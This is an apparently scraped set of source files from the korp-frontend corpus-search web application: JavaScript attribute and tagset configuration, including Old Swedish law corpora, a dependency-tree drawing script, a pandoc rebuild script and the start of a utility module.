KN: `KN`,\n NN: `NN`,\n PC: `PC`,\n PL: `PL`,\n PM: `PM`,\n PN: `PN`,\n PP: `PP`,\n PS: `PS`,\n RG: `RG`,\n RO: `RO`,\n SN: `SN`,\n UO: `UO`,\n VB: `VB`,\n },\n opts: liteOptions,\n extendedComponent: `datasetSelect`,\n escape: false,\n order: 0,\n};\n\nattrs.msd = {\n label: `msd`,\n opts: settings.defaultOptions,\n extendedTemplate: `<input ng-model=\"input\" class=\"arg_value\" escaper ng-model-options='{debounce : {default : 300, blur : 0}, updateOn: \"default blur\"}'>` +\n `<span ng-click=\"onIconClick()\" class=\"fa fa-info-circle\"></span>`,\n extendedController: function($scope, $uibModal) {\n var modal = null;\n\n $scope.onIconClick = function() {\n var msdHTML = settings.markup.msd;\n modal = $uibModal.open({\n template: `<div>` +\n `<div class=\"modal-header\">` +\n `<h3 class=\"modal-title\">{{'msd_long' | loc:lang}}</h3>` +\n `<span ng-click=\"clickX()\" class=\"close-x\">×</span>` +\n `</div>` +\n `<div class=\"modal-body msd-modal\" ng-click=\"msdClick($event)\" ng-include=\"` + msdHTML + `\"></div>` +\n `</div>`,\n scope: $scope,\n });\n };\n $scope.clickX = function(event) {\n modal.close();\n };\n $scope.msdClick = function(event) {\n val = $(event.target).parent().data(`value`);\n if(!val) return;\n $scope.input = val;\n modal.close();\n };\n },\n};\nattrs.baseform = {\n label: `baseform`,\n type: `set`,\n opts: extendedSetOptions,\n extendedTemplate: `<input ng-model='input' escaper>`,\n order: 1,\n};\nattrs.gloss = {\n label: `gloss`,\n type: `set`,\n opts: extendedSetOptions,\n order: 2,\n};\nattrs.lemgram = {\n label: `lemgram`,\n type: `set`,\n opts: setOptions,\n stringify: function(lemgram) {\n // TODO: what if we're getting more than one consequtive lemgram back?\n return util.lemgramToString(_.trim(lemgram), true);\n },\n externalSearch: karpLemgramLink,\n internalSearch: true,\n extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' typeahead-close-callback='checkForError(valueSelected)' text-in-field='textInField'/>` +\n `<span ng-if='valueError' style='color: red; position: relative; top: 3px; margin-left: 6px'>{{'choose_lemgram' | loc:lang}}</span>`,\n extendedController: function($scope) {\n $scope.valueError = false;\n\n 
$scope.checkForError = function(valueSelected) {\n            $scope.valueError = !valueSelected;\n        };\n    },\n    order: 2,\n};\nattrs.dalinlemgram = {\n    label: `dalin-lemgram`,\n    type: `set`,\n    opts: setOptions,\n    stringify: function(lemgram) {\n        // TODO: what if we're getting more than one consecutive lemgram back?\n        return util.lemgramToString(_.trim(lemgram), true);\n    },\n    externalSearch: karpLemgramLink,\n    internalSearch: true,\n    extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' variant='dalin' text-in-field='textInField'/>`,\n    order: 2,\n};\nattrs.saldo = {\n    label: `saldo`,\n    type: `set`,\n    opts: setOptions,\n    stringify: function(saldo) {\n        return util.saldoToString(saldo, true);\n    },\n    externalSearch: `https://spraakbanken.gu.se/karp/#?mode=DEFAULT&search=extended||and|sense|equals|<%= val %>`,\n    internalSearch: true,\n    extendedTemplate: settings.senseAutoComplete,\n    order: 3,\n};\n\nattrs.dep = {\n    label: `dep`,\n    type: `set`,\n    opts: extendedSetOptions,\n    order: 3,\n};\n\nattrs.dephead = {\n    label: `dephead`,\n    displayType: `hidden`,\n};\nattrs.deprel = {\n    label: `deprel`,\n    translationKey: `deprel_`,\n    extendedComponent: `datasetSelect`,\n    dataset: {\n        \"++\": `++`,\n        \"+A\": `+A`,\n        \"+F\": `+F`,\n        AA: `AA`,\n        AG: `AG`,\n        AN: `AN`,\n        AT: `AT`,\n        CA: `CA`,\n        DB: `DB`,\n        DT: `DT`,\n        EF: `EF`,\n        EO: `EO`,\n        ES: `ES`,\n        ET: `ET`,\n        FO: `FO`,\n        FP: `FP`,\n        FS: `FS`,\n        FV: `FV`,\n        \"I?\": `I?`,\n        IC: `IC`,\n        IG: `IG`,\n        IK: `IK`,\n        IM: `IM`,\n        IO: `IO`,\n        IP: `IP`,\n        IQ: `IQ`,\n        IR: `IR`,\n        IS: `IS`,\n        IT: `IT`,\n        IU: `IU`,\n        IV: `IV`,\n        JC: `JC`,\n        JG: `JG`,\n        JR: `JR`,\n        JT: `JT`,\n        KA: `KA`,\n        MA: `MA`,\n        MS: `MS`,\n        NA: `NA`,\n        OA: `OA`,\n        OO: `OO`,\n        OP: `OP`,\n        PL: `PL`,\n        PR: `PR`,\n        PT: `PT`,\n        RA: `RA`,\n        SP: `SP`,\n        SS: `SS`,\n        TA: `TA`,\n        TT: `TT`,\n        UK: `UK`,\n        VA: `VA`,\n        VO: `VO`,\n        VS: `VS`,\n        XA: `XA`,\n        XF: `XF`,\n        XT: `XT`,\n        XX: `XX`,\n        YY: `YY`,\n        CJ: `CJ`,\n        HD: `HD`,\n        IF: `IF`,\n        PA: `PA`,\n        UA: `UA`,\n        VG: `VG`,\n        ROOT: `ROOT`,\n    },\n    opts: liteOptions,\n};\nattrs.prefix = {\n    label: `prefix`,\n    type: `set`,\n    opts: setOptions,\n    stringify: function(lemgram) {\n        return util.lemgramToString(lemgram, true);\n    },\n    externalSearch: karpLemgramLink,\n    internalSearch: true,\n    extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' variant='affix' text-in-field='textInField'/>`,\n};\nattrs.suffix = {\n    label: `suffix`,\n    type: `set`,\n    opts: setOptions,\n    stringify: function(lemgram) {\n        return util.lemgramToString(lemgram, true);\n    },\n    externalSearch: karpLemgramLink,\n    internalSearch: true,\n    extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' variant='affix' text-in-field='textInField'/>`,\n};\nattrs.ref = {\n    label: `ref`,\n    displayType: `hidden`,\n};\nattrs.link = {\n    label: `sentence_link`,\n};\nattrs.ne_ex = {\n    label: `ne_expr`,\n    translationKey: `ne_expr_`,\n    extendedComponent: `datasetSelect`,\n    isStructAttr: true,\n    dataset: [\n        `ENAMEX`,\n        `TIMEX`,\n        `NUMEX`,\n    ],\n};\nattrs.ne_type = {\n    label: `ne_type`,\n    translationKey: `ne_type_`,\n    extendedComponent: `datasetSelect`,\n    isStructAttr: true,\n    dataset: [\n        `LOC`,\n        `PRS`,\n        `ORG`,\n        `EVN`,\n        `WRK`,\n        `OBJ`,\n        `MSR`,\n        `TME`,\n    ],\n};\nattrs.ne_subtype = {\n    label: `ne_subtype`,\n    translationKey: `ne_subtype_`,\n    extendedComponent: `datasetSelect`,\n    isStructAttr: true,\n    dataset: [\n        `AST`,\n        `GPL`,\n        `PPL`,\n        `FNC`,\n        `STR`,\n        `HUM`,\n        `MTH`,\n        `ANM`,\n        `CLC`,\n        `FIN`,\n        `ATH`,\n        `CLT`,\n        `PLT`,\n        `TVR`,\n        `EDU`,\n        `TRN`,\n        
`CRP`,\n `HPL`,\n `WTH`,\n `CLU`,\n `ATL`,\n `RLG`,\n `WRT`,\n `RTV`,\n `WAO`,\n `PRJ`,\n `WMD`,\n `WAE`,\n `MDC`,\n `FWP`,\n `CMP`,\n `VHA`,\n `VHG`,\n `VHW`,\n `PRZ`,\n `PRD`,\n `VLM`,\n `TMP`,\n `INX`,\n `DST`,\n `PRC`,\n `CUR`,\n `DEN`,\n `DSG`,\n `SPD`,\n `FRQ`,\n `AGE`,\n `MSU`,\n `WMU`,\n `CMU`,\n `WEB`,\n `PSS`,\n `CVU`,\n `IDX`,\n `LST`,\n `DAT`,\n `PER`,\n ],\n stringify: function(val) {\n lString = util.getLocaleStringUndefined(`ne_subtype_` + val);\n return lString || val;\n },\n};\nattrs.ne_name = {\n label: `ne_name`,\n isStructAttr: true,\n};\nsattrs.date = {\n label: `date`,\n};\n\nvar modernAttrsOld = {\n pos: attrs.pos,\n msd: attrs.msd,\n lemma: attrs.baseform,\n lex: attrs.lemgram,\n saldo: attrs.saldo,\n dephead: attrs.dephead,\n deprel: attrs.deprel,\n ref: attrs.ref,\n prefix: attrs.prefix,\n suffix: attrs.suffix,\n};\n\n\nvar modernAttrs = {\n pos: attrs.pos,\n msd: attrs.msd,\n lemma: attrs.baseform,\n lex: attrs.lemgram,\n dephead: attrs.dephead,\n deprel: attrs.deprel,\n ref: attrs.ref,\n prefix: attrs.prefix,\n suffix: attrs.suffix,\n ne_ex: attrs.ne_ex,\n ne_type: attrs.ne_type,\n ne_subtype: attrs.ne_subtype,\n ne_name: attrs.ne_name,\n complemgram: {\n label: `complemgram`,\n internalSearch: true,\n ranked: true,\n display: {\n expandList: {\n splitValue: function(value) { return value.split(`+`); },\n searchKey: `lex`,\n joinValues: ` + `,\n stringify: function(lemgram) { return util.lemgramToString(lemgram, true); },\n linkAllValues: true,\n },\n },\n type: `set`,\n hideStatistics: true,\n hideExtended: true,\n hideCompare: true,\n },\n compwf: {\n label: `compwf`,\n display: {\n expandList: {},\n },\n type: `set`,\n hideStatistics: true,\n hideExtended: true,\n hideCompare: true,\n },\n sense: {\n label: `sense`,\n type: `set`,\n ranked: true,\n display: {\n expandList: {\n internalSearch: function(key, value) { return `[` + key + ` highest_rank '` + regescape(value) + `']`; },\n },\n },\n stringify: function(sense) { return util.saldoToString(sense, true); },\n opts: probabilitySetOptions,\n externalSearch: `https://spraakbanken.gu.se/karp/#?mode=DEFAULT&search=extended||and|sense|equals|<%= val %>`,\n internalSearch: true,\n extendedTemplate: settings.senseAutoComplete,\n },\n};\n\nvar modernAttrs2 = {\n pos: attrs.pos,\n msd: attrs.msd,\n lemma: attrs.baseform,\n lex: attrs.lemgram,\n dephead: attrs.dephead,\n deprel: attrs.deprel,\n ref: attrs.ref,\n prefix: attrs.prefix,\n suffix: attrs.suffix,\n ne_ex: attrs.ne_ex,\n ne_type: attrs.ne_type,\n ne_subtype: attrs.ne_subtype,\n ne_name: attrs.ne_name,\n complemgram: modernAttrs.complemgram,\n compwf: modernAttrs.compwf,\n sense: modernAttrs.sense,\n sentiment: {\n label: `sentiment`,\n },\n blingbring: {\n label: `blingbring`,\n type: `set`,\n internalSearch: true,\n },\n swefn: {\n label: `swefn`,\n type: `set`,\n externalSearch: `https://spraakbanken.gu.se/karp/#?mode=swefn&search=sense%7C%7Cswefn--<%= val %>`,\n internalSearch: true,\n },\n};\n\nvar lexClassesText = {\n text_blingbring: {\n label: `blingbring`,\n type: `set`,\n isStructAttr: true,\n ranked: true,\n order: 500,\n display: {\n expandList: {\n internalSearch: function(key, value) { return `[_.text_blingbring highest_rank '` + regescape(value) + `']`; },\n linkAllValues: true,\n showAll: true,\n },\n },\n internalSearch: true,\n },\n text_swefn: {\n label: `swefn`,\n type: `set`,\n isStructAttr: true,\n ranked: true,\n order: 501,\n display: {\n expandList: {\n internalSearch: function(key, value) { return `[_.text_swefn highest_rank '` + 
regescape(value) + `']`; },\n linkAllValues: true,\n showAll: true,\n },\n },\n externalSearch: `https://spraakbanken.gu.se/karp/#?mode=swefn&search=sense%7C%7Cswefn--<%= val %>`,\n internalSearch: true,\n },\n};\n\nvar readability = {\n lix: {\n label: `lix`,\n isStructAttr: true,\n order: 600,\n },\n ovix: {\n label: `ovix`,\n isStructAttr: true,\n order: 601,\n },\n nk: {\n label: `nk`,\n isStructAttr: true,\n order: 602,\n },\n};\n\nsettings.posset = {\n type: `set`,\n label: `posset`,\n opts: setOptions,\n translationKey: `pos_`,\n extendedComponent: `datasetSelect`,\n dataset: {\n AB: `AB`,\n \"MID|MAD|PAD\": `DL`,\n DT: `DT`,\n HA: `HA`,\n HD: `HD`,\n HP: `HP`,\n HS: `HS`,\n IE: `IE`,\n IN: `IN`,\n JJ: `JJ`,\n KN: `KN`,\n NN: `NN`,\n PC: `PC`,\n PL: `PL`,\n PM: `PM`,\n PN: `PN`,\n PP: `PP`,\n PS: `PS`,\n RG: `RG`,\n RO: `RO`,\n SN: `SN`,\n UO: `UO`,\n VB: `VB`,\n },\n order: 0,\n};\n\nsettings.fsvlemma = {\n type: `set`,\n label: `baseform`,\n opts: setOptions,\n extendedTemplate: `<input ng-model='model' >`,\n};\nsettings.fsvlex = {\n type: `set`,\n label: `lemgram`,\n opts: setOptions,\n extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' text-in-field='textInField'/>`,\n stringify: function(str) {\n return util.lemgramToString(str, true);\n },\n externalSearch: karpLemgramLink,\n internalSearch: true,\n};\nsettings.fsvvariants = {\n type: `set`,\n label: `variants`,\n stringify: function(str) {\n return util.lemgramToString(str, true);\n },\n extendedTemplate: `<autoc model='model' placeholder='placeholder' type='lemgram' text-in-field='textInField'/>`,\n opts: setOptions,\n externalSearch: karpLemgramLink,\n internalSearch: true,\n order: 4,\n};\n\nsettings.fsvdescription = `<a target=\"_blank\" href=\"http://project2.sol.lu.se/fornsvenska/\">Fornsvenska textbanken</a> är ett projekt som digitaliserar fornsvenska texter och gör dem tillgängliga över webben. 
Projektet leds av Lars-Olof Delsing vid Lunds universitet.`;\n\nvar fsv_yngrelagar = {\n morphology: `fsvm`,\n id: `fsv-yngrelagar`,\n title: `Yngre lagar – Fornsvenska textbankens material`,\n description: settings.fsvdescription,\n within: settings.defaultWithin,\n context: spContext,\n attributes: {\n posset: settings.posset,\n lemma: settings.fsvlemma,\n lex: settings.fsvlex,\n variants: settings.fsvvariants,\n },\n structAttributes: {\n text_title: {\n label: `title`,\n extendedComponent: `datasetSelect`,\n dataset: [\n `Kristoffers Landslag, nyskrivna flockar i förhållande till MEL`,\n `Kristoffers Landslag, innehållsligt ändrade flockar i förhållande til MEL`,\n `Kristoffers Landslag, flockar direkt hämtade från MEL`,\n `Kristoffers Landslag`,\n ],\n },\n text_date: { label: `date` },\n },\n};\n\nvar fsv_aldrelagar = {\n morphology: `fsvm`,\n id: `fsv-aldrelagar`,\n title: `Äldre lagar – Fornsvenska textbankens material`,\n description: settings.fsvdescription,\n within: settings.defaultWithin,\n context: spContext,\n attributes: {\n posset: settings.posset,\n lemma: settings.fsvlemma,\n lex: settings.fsvlex,\n variants: settings.fsvvariants,\n },\n structAttributes: {\n text_title: {\n label: `title`,\n extendedComponent: `datasetSelect`,\n dataset: [\n `Yngre Västgötalagens äldsta fragment, Lydekini excerpter och anteckningar`,\n `Tillägg till Upplandslagen, hskr A (Ups B 12)`,\n `Södermannalagen, enligt Codex iuris Sudermannici`,\n `Östgötalagen, fragment H, ur Kyrkobalken ur Skokloster Avdl I 145`,\n `Yngre Västmannalagen, enl Holm B 57`,\n `Vidhemsprästens anteckningar`,\n `Magnus Erikssons Stadslag, exklusiva stadslagsflockar`,\n `Södermannalagens additamenta, efter NKS 2237`,\n `Hälsingelagen`,\n `Yngre Västgötalagen, tillägg, enligt Holm B 58`,\n `Östgötalagen, fragment C, ur Holm B 1709`,\n `Yngre Västgötalagen, enligt Holm B 58`,\n `Upplandslagen enl Schlyters utgåva och Codex Ups C 12, hskr A`,\n `Skånelagen, enligt Holm B 76`,\n `Östgötalagen, fragment D, ur Holm B 24`,\n `Östgötalagen A, ur Holm B 50`,\n `Äldre Västgötalagen`,\n `Östgötalagen, fragment M, ur Holm B 196`,\n `Gutalagen enligt Holm B 64`,\n `Upplandslagen enligt Codex Holm B 199, Schlyters hskr B`,\n `Smålandslagens kyrkobalk`,\n `Dalalagen (Äldre Västmannalagen)`,\n `Gutalagens additamenta enligt AM 54`,\n `Bjärköarätten`,\n `Magnus Erikssons Landslag`,\n `Östgötalagen, fragment N, ur Köpenhamn AM 1056`,\n `Södermannalagen stadsfästelse - Confirmatio, enligt NKS 2237`,\n `Östgötalagen, fragment E, ur Ups B 22`,\n ],\n },\n text_date: { label: `date` },\n },\n};\n\nsettings.commonStructTypes = {\n date_interval: {\n label: `date_interval`,\n hideSidebar: `true`,\n hideCompare: `true`,\n hideStatistics: `true`,\n opts: false,\n extendedTemplate: `<div class=\"date_interval_arg_type\"> <div class=\"section\"> <button class=\"btn btn-default btn-sm\" popper no-close-on-click my=\"left top\" at=\"right top\"> <i class=\"fa fa-calendar\"></i> Från </button> {{combined.format(\"YYYY-MM-DD HH:mm\")}} <time-interval ng-click=\"from_click($event)\" class=\"date_interval popper_menu dropdown-menu\" date-model=\"from_date\" time-model=\"from_time\" model=\"combined\" min-date=\"minDate\" max-date=\"maxDate\"> </time-interval> </div> <div class=\"section\"> <button class=\"btn btn-default btn-sm\" popper no-close-on-click my=\"left top\" at=\"right top\"> <i class=\"fa fa-calendar\"></i> Till </button> {{combined2.format(\"YYYY-MM-DD HH:mm\")}} <time-interval ng-click=\"from_click($event)\" class=\"date_interval 
popper_menu dropdown-menu\" date-model=\"to_date\" time-model=\"to_time\" model=\"combined2\" my=\"left top\" at=\"right top\" min-date=\"minDate\" max-date=\"maxDate\"> </time-interval> </div> </div>`,\n extendedController: [\n `$scope`, `searches`, `$timeout`, function($scope, searches, $timeout) {\n var cl, getTime, getYear, ref, ref1, ref2, s, updateIntervals;\n s = $scope;\n cl = settings.corpusListing;\n\n updateIntervals = function() {\n var from, moments, ref, ref1, to;\n moments = cl.getMomentInterval();\n if (moments.length) {\n return ref = _.invokeMap(moments, `toDate`), s.minDate = ref[0], s.maxDate = ref[1], ref;\n } else {\n ref1 = cl.getTimeInterval(), from = ref1[0], to = ref1[1];\n s.minDate = moment(from.toString(), `YYYY`).toDate();\n return s.maxDate = moment(to.toString(), `YYYY`).toDate();\n }\n };\n\n s.$on(`corpuschooserchange`, function() {\n return updateIntervals();\n });\n\n updateIntervals();\n\n s.from_click = function(event) {\n event.originalEvent.preventDefault();\n return event.originalEvent.stopPropagation();\n };\n\n getYear = function(val) {\n return moment(val.toString(), `YYYYMMDD`).toDate();\n };\n\n getTime = function(val) {\n return moment(val.toString(), `HHmmss`).toDate();\n };\n\n if (!s.model) {\n s.from_date = s.minDate;\n s.to_date = s.maxDate;\n ref = _.invokeMap(cl.getMomentInterval(), `toDate`), s.from_time = ref[0], s.to_time = ref[1];\n } else if (s.model.length === 4) {\n ref1 = _.map(s.model.slice(0, 3), getYear), s.from_date = ref1[0], s.to_date = ref1[1];\n ref2 = _.map(s.model.slice(2), getTime), s.from_time = ref2[0], s.to_time = ref2[1];\n }\n return s.$watchGroup([`combined`, `combined2`], function(arg) {\n var combined, combined2;\n combined = arg[0], combined2 = arg[1];\n return s.model = [moment(s.from_date).format(`YYYYMMDD`), moment(s.to_date).format(`YYYYMMDD`), moment(s.from_time).format(`HHmmss`), moment(s.to_time).format(`HHmmss`)];\n });\n },\n ],\n },\n};\n\nmodule.exports = {\n spWithin,\n spContext,\n modernAttrs,\n modernAttrs2,\n defaultContext,\n attrs,\n sattrs,\n modernAttrsOld,\n setOptions,\n liteOptions,\n lexClassesText,\n readability,\n fsv_aldrelagar,\n fsv_yngrelagar,\n};\n"
},
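A short usage sketch of the exports above, as a mode file might consume them (the corpus id `example_corpus` is hypothetical; `attrs`, `spWithin` and `spContext` are the names listed in the `module.exports` of `modes/common.js`):

```javascript
// Hypothetical mode-file fragment reusing the shared definitions.
settings.corpora[`example_corpus`] = {
    id: `example_corpus`,
    title: `Example Corpus`,
    description: `Invented corpus showing how the shared attributes plug in`,
    within: spWithin,          // sentence/paragraph elements
    context: spContext,        // sentence/paragraph context sizes
    attributes: {
        pos: attrs.pos,        // dataset select of POS tags
        lemma: attrs.baseform, // set-valued, searched with extendedSetOptions
        msd: attrs.msd,        // free-text input with the MSD help modal
    },
    structAttributes: {},
};

settings.corpusListing = new CorpusListing(settings.corpora);
```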
{
"alpha_fraction": 0.49135446548461914,
"alphanum_fraction": 0.5012350678443909,
"avg_line_length": 27.08092498779297,
"blob_id": "3a7ca3cea6f05e0250f8ba80abb7c85206c7a709",
"content_id": "4fea75df302b2b0934290cb2bdab8e72b5b502bf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4858,
"license_type": "permissive",
"max_line_length": 169,
"num_lines": 173,
"path": "/app/lib/deptrees/js/deptrees.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "// Generated by CoffeeScript 1.4.0\n(function() {\n var color_from_chars, draw_brat_tree, isNumber, make_entity_from_pos, make_relation_from_rel, webFontURLs;\n\n window.draw_deptree = function(sent, hover_fun) {\n var deprel_div, sent_id;\n if (hover_fun == null) {\n hover_fun = function() {};\n }\n sent_id = \"magic_secret_id\";\n deprel_div = $(\"<div>\").attr(\"id\", sent_id);\n $('body').empty().append(deprel_div);\n return draw_brat_tree(sent, sent_id, hover_fun);\n };\n\n window.sentence_xml_to_json = function(sent) {\n return _.map($(sent).children(), function(word) {\n var obj;\n obj = {\n word: word.textContent\n };\n _.map([\"pos\", \"ref\", \"dephead\", \"deprel\"], function(attr) {\n return obj[attr] = $(word).attr(attr);\n });\n return obj;\n });\n };\n\n $(document).ready(head.js);\n\n webFontURLs = [\"lib/brat/static/fonts/Astloch-Bold.ttf\", \"lib/brat/static/fonts/PT_Sans-Caption-Web-Regular.ttf\", \"lib/brat/static/fonts/Liberation_Sans-Regular.ttf\"];\n\n color_from_chars = function(w, sat_min, sat_max, lightness) {\n var color, hue, i, len, sat, v;\n v = 1.0;\n hue = 0.0;\n sat = 0.0;\n len = w.length;\n i = 0;\n while (i < len) {\n v = v / 26.0;\n sat += ((w.charCodeAt(i)) % 26) * v;\n hue += ((w.charCodeAt(i)) % 26) * (1.0 / 26 / len);\n i++;\n }\n hue = hue * 360;\n sat = sat * (sat_max - sat_min) + sat_min;\n color = $.Color({\n hue: hue,\n saturation: sat,\n lightness: lightness\n });\n return color.toHexString(0);\n };\n\n make_entity_from_pos = function(p) {\n return {\n type: p,\n labels: [p],\n bgColor: color_from_chars(p, 0.8, 0.95, 0.95),\n borderColor: \"darken\"\n };\n };\n\n make_relation_from_rel = function(r) {\n return {\n type: r,\n labels: [r],\n color: \"#000000\",\n args: [\n {\n role: \"parent\",\n targets: []\n }, {\n role: \"child\",\n targets: []\n }\n ]\n };\n };\n\n isNumber = function(n) {\n return (!isNaN(parseFloat(n))) && isFinite(n);\n };\n\n draw_brat_tree = function(words, to_div, hover_fun) {\n var add_word, added_pos, added_rel, collData, docData, entities, entity_types, ix, len, relation_types, relations, text, word, _i, _len;\n entity_types = [];\n relation_types = [];\n entities = [];\n relations = [];\n added_pos = [];\n added_rel = [];\n add_word = function(word, start, stop) {\n var attr, dephead, deprel, entity, pos, ref, relation, _ref;\n _ref = (function() {\n var _i, _len, _ref, _results;\n _ref = [\"pos\", \"ref\", \"dephead\", \"deprel\"];\n _results = [];\n for (_i = 0, _len = _ref.length; _i < _len; _i++) {\n attr = _ref[_i];\n _results.push(word[attr]);\n }\n return _results;\n })(), pos = _ref[0], ref = _ref[1], dephead = _ref[2], deprel = _ref[3];\n if (!_.contains(added_pos, pos)) {\n added_pos.push(pos);\n entity_types.push(make_entity_from_pos(pos));\n }\n if (!_.contains(added_rel, deprel)) {\n added_rel.push(deprel);\n relation_types.push(make_relation_from_rel(deprel));\n }\n entity = [\"T\" + ref, pos, [[start, stop]]];\n entities.push(entity);\n if (isNumber(dephead)) {\n relation = [\"R\" + ref, deprel, [[\"parent\", \"T\" + dephead], [\"child\", \"T\" + ref]]];\n return relations.push(relation);\n }\n };\n text = ((function() {\n var _i, _len, _results;\n _results = [];\n for (_i = 0, _len = words.length; _i < _len; _i++) {\n word = words[_i];\n _results.push(word.word);\n }\n return _results;\n })()).join(\" \");\n ix = 0;\n for (_i = 0, _len = words.length; _i < _len; _i++) {\n word = words[_i];\n len = word.word.length;\n add_word(word, ix, ix + len);\n ix += len + 1;\n }\n collData = {\n 
entity_types: entity_types,\n relation_types: relation_types\n };\n docData = {\n text: text,\n entities: entities,\n relations: relations\n };\n return head.ready(function() {\n var dispatcher, div;\n dispatcher = Util.embed(to_div, collData, docData, webFontURLs);\n div = $(\"#\" + to_div);\n return dispatcher.on('doneRendering', function() {\n _.map(div.find(\"g.arcs\").children(), function(g) {\n var deprel;\n deprel = $(g).find(\"text\").data(\"arc-role\");\n return $(g).hover(function() {\n return hover_fun({\n deprel: deprel\n });\n });\n });\n return _.map(div.find(\"g.span text\"), function(g) {\n var pos;\n pos = $(g).text();\n return $(g).parent().hover(function() {\n return hover_fun({\n pos: pos\n });\n });\n });\n });\n });\n };\n\n}).call(this);\n"
},
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.7333333492279053,
"avg_line_length": 18.66666603088379,
"blob_id": "d25dd1bd117c0126553e024d361e5b86d12145c3",
"content_id": "3dfc7a83ccfa6d1203a89b3fe8f3d100a0e3825f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 60,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 3,
"path": "/doc/rebuild.sh",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\npandoc -o frontend_devel.html frontend_devel.md\n\n"
},
{
"alpha_fraction": 0.5229880809783936,
"alphanum_fraction": 0.5276082754135132,
"avg_line_length": 32.215179443359375,
"blob_id": "61560f7af8e8691a4bcd237e5e25f75a255d52da",
"content_id": "6abf39ed29d72d82b85370193ab14e1fe0c1f727",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 39844,
"license_type": "permissive",
"max_line_length": 228,
"num_lines": 1199,
"path": "/app/scripts/util.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst folderImg = require(\"../img/folder.png\")\nconst korpIconImg = require(\"../img/korp_icon.png\")\nconst jRejectBackgroundImg = require(\"../img/browsers/background_browser.gif\")\nrequire(\"../img/browsers/browser_chrome.gif\")\nrequire(\"../img/browsers/browser_firefox.gif\")\nrequire(\"../img/browsers/browser_safari.gif\")\nrequire(\"../img/browsers/browser_opera.gif\")\n\nwindow.util = {}\n\nwindow.CorpusListing = class CorpusListing {\n constructor(corpora) {\n this.struct = corpora\n this.corpora = _.values(corpora)\n this.selected = _.filter(this.corpora, (corp) => !corp.limitedAccess)\n }\n\n get(key) {\n return this.struct[key]\n }\n\n list() {\n return this.corpora\n }\n\n map(func) {\n return _.map(this.corpora, func)\n }\n\n subsetFactory(idArray) {\n // returns a new CorpusListing instance from an id subset.\n idArray = _.invokeMap(idArray, \"toLowerCase\")\n const cl = new CorpusListing(_.pick(this.struct, ...idArray))\n cl.selected = cl.corpora\n return cl\n }\n\n // only applicable for parallel corpora\n getReduceLang() {}\n\n // Returns an array of all the selected corpora's IDs in uppercase\n getSelectedCorpora() {\n return corpusChooserInstance.corpusChooser(\"selectedItems\")\n }\n\n select(idArray) {\n this.selected = _.values(_.pick.apply(this, [this.struct].concat(idArray)))\n }\n\n mapSelectedCorpora(f) {\n return _.map(this.selected, f)\n }\n\n // takes an array of mapping objs and returns their intersection\n _mapping_intersection(mappingArray) {\n return _.reduce(\n mappingArray,\n function (a, b) {\n const keys_intersect = _.intersection(_.keys(a), _.keys(b))\n const to_mergea = _.pick(a, ...keys_intersect)\n const to_mergeb = _.pick(b, ...keys_intersect)\n return _.merge({}, to_mergea, to_mergeb)\n } || {}\n )\n }\n\n _mapping_union(mappingArray) {\n return _.reduce(mappingArray, (a, b) => _.merge(a, b), {})\n }\n\n getCurrentAttributes(lang) {\n // lang not used here, only in parallel mode\n const attrs = this.mapSelectedCorpora((corpus) => corpus.attributes)\n return this._invalidateAttrs(attrs)\n }\n\n getCurrentAttributesIntersection() {\n const attrs = this.mapSelectedCorpora((corpus) => corpus.attributes)\n\n return this._mapping_intersection(attrs)\n }\n\n getStructAttrsIntersection() {\n const attrs = this.mapSelectedCorpora(function (corpus) {\n for (let key in corpus.structAttributes) {\n const value = corpus.structAttributes[key]\n value[\"isStructAttr\"] = true\n }\n\n return corpus.structAttributes\n })\n return this._mapping_intersection(attrs)\n }\n\n getStructAttrs() {\n const attrs = this.mapSelectedCorpora(function (corpus) {\n for (let key in corpus.structAttributes) {\n const value = corpus.structAttributes[key]\n value[\"isStructAttr\"] = true\n }\n\n // if a position attribute is declared as structural, include here\n const pos_attrs = _.pickBy(corpus.attributes, (val, key) => {\n return val.isStructAttr\n })\n return _.extend({}, pos_attrs, corpus.structAttributes)\n })\n const rest = this._invalidateAttrs(attrs)\n\n // TODO this code merges datasets from attributes with the same name and\n // should be moved to the code for extended controller \"datasetSelect\"\n const withDataset = _.filter(_.toPairs(rest), (item) => item[1].dataset)\n $.each(withDataset, function (i, item) {\n const key = item[0]\n const val = item[1]\n return $.each(attrs, function (j, origStruct) {\n if (origStruct[key] && origStruct[key].dataset) {\n let ds = origStruct[key].dataset\n if ($.isArray(ds)) {\n ds = _.zipObject(ds, ds)\n 
}\n\n if (_.isArray(val.dataset)) {\n val.dataset = _.zipObject(val.dataset, val.dataset)\n }\n return $.extend(val.dataset, ds)\n }\n })\n })\n\n return $.extend(rest, _.fromPairs(withDataset))\n }\n // End TODO\n\n getDefaultFilters() {\n return this._getFilters(\"intersection\", \"defaultFilters\")\n }\n\n getCurrentFilters() {\n return this._getFilters(settings.filterSelection, \"showFilters\")\n }\n\n _getFilters(selection, filterType) {\n let attrNames = []\n let attrs = {}\n\n for (let corpus of this.selected) {\n if (filterType in corpus) {\n for (let filter of corpus[filterType]) {\n if (!attrNames.includes(filter)) {\n attrNames.push(filter)\n }\n if (!(filter in attrs)) {\n attrs[filter] = {\n settings: corpus.structAttributes[filter],\n corpora: [corpus.id],\n }\n } else {\n attrs[filter].corpora.push(corpus.id)\n }\n }\n }\n }\n\n if (selection === \"intersection\") {\n const attrNames2 = []\n const attrs2 = {}\n const corpusCount = this.selected.length\n for (let attr of attrNames) {\n if (attrs[attr].corpora.length === corpusCount) {\n attrNames2.push(attr)\n attrs2[attr] = attrs[attr]\n }\n }\n attrNames = attrNames2\n attrs = 